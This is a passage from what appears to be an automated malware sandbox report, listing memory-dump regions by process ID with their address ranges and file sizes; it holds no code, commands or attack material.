                                                                                                          • memory/4416-241-0x0000000003005000-0x0000000003007000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4416-231-0x0000000003000000-0x0000000003002000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4416-239-0x0000000003002000-0x0000000003004000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4416-240-0x0000000003004000-0x0000000003005000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4416-221-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4452-229-0x0000000002470000-0x0000000002472000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4452-238-0x0000000002472000-0x0000000002474000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/4452-224-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4452-243-0x0000000002475000-0x0000000002476000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/4580-235-0x0000000000F00000-0x0000000000F0D000-memory.dmp
                                                                                                            Filesize

                                                                                                            52KB

                                                                                                          • memory/4580-232-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4596-268-0x00000000008B0000-0x00000000008C2000-memory.dmp
                                                                                                            Filesize

                                                                                                            72KB

                                                                                                          • memory/4596-267-0x00000000001F0000-0x0000000000200000-memory.dmp
                                                                                                            Filesize

                                                                                                            64KB

                                                                                                          • memory/4596-259-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4696-360-0x0000000000000000-mapping.dmp
                                                                                                          • memory/4732-262-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5232-264-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5232-272-0x0000000002B70000-0x0000000002B71000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5232-269-0x00000000008A0000-0x00000000008A1000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/5232-271-0x0000000001010000-0x0000000001012000-memory.dmp
                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/5360-361-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5652-365-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5688-362-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5796-366-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5924-367-0x0000000000000000-mapping.dmp
                                                                                                          • memory/5960-364-0x0000000000000000-mapping.dmp
                                                                                                          • memory/6540-359-0x0000000000000000-mapping.dmp
                                                                                                          • memory/7340-321-0x0000000000000000-mapping.dmp
                                                                                                          • memory/7664-307-0x0000000000000000-mapping.dmp
                                                                                                          • memory/7768-308-0x0000000000000000-mapping.dmp
                                                                                                          • memory/7940-322-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8012-331-0x0000000005590000-0x0000000005591000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/8012-318-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8164-326-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8196-327-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8276-335-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8396-333-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8432-334-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8468-332-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8680-336-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8744-337-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8924-339-0x0000000002E70000-0x0000000002E71000-memory.dmp
                                                                                                            Filesize

                                                                                                            4KB

                                                                                                          • memory/8924-338-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8960-343-0x0000000000000000-mapping.dmp
                                                                                                          • memory/8960-345-0x0000000004A40000-0x0000000004A9C000-memory.dmp
                                                                                                            Filesize

                                                                                                            368KB

                                                                                                          • memory/8960-344-0x00000000047E9000-0x00000000048EA000-memory.dmp
                                                                                                            Filesize

                                                                                                            1.0MB

                                                                                                          • memory/9384-341-0x0000000000000000-mapping.dmp
                                                                                                          • memory/9496-342-0x0000000000000000-mapping.dmp
                                                                                                          • memory/9636-354-0x0000000000000000-mapping.dmp
                                                                                                          • memory/9640-311-0x00000000004163C6-mapping.dmp
                                                                                                          • memory/9640-317-0x0000000002E70000-0x0000000002EAE000-memory.dmp
                                                                                                            Filesize

                                                                                                            248KB

                                                                                                          • memory/9816-350-0x0000000000000000-mapping.dmp
                                                                                                          • memory/9868-355-0x0000000000000000-mapping.dmp
                                                                                                          • memory/9912-244-0x0000000000000000-mapping.dmp
                                                                                                          • memory/9932-245-0x0000000000000000-mapping.dmp
                                                                                                          • memory/10096-356-0x0000000000000000-mapping.dmp
                                                                                                          • memory/10128-246-0x0000000000000000-mapping.dmp
                                                                                                          • memory/10148-340-0x0000000000000000-mapping.dmp
                                                                                                          • memory/10220-249-0x0000000000000000-mapping.dmp
                                                                                                          • memory/10232-369-0x00000000004163DA-mapping.dmp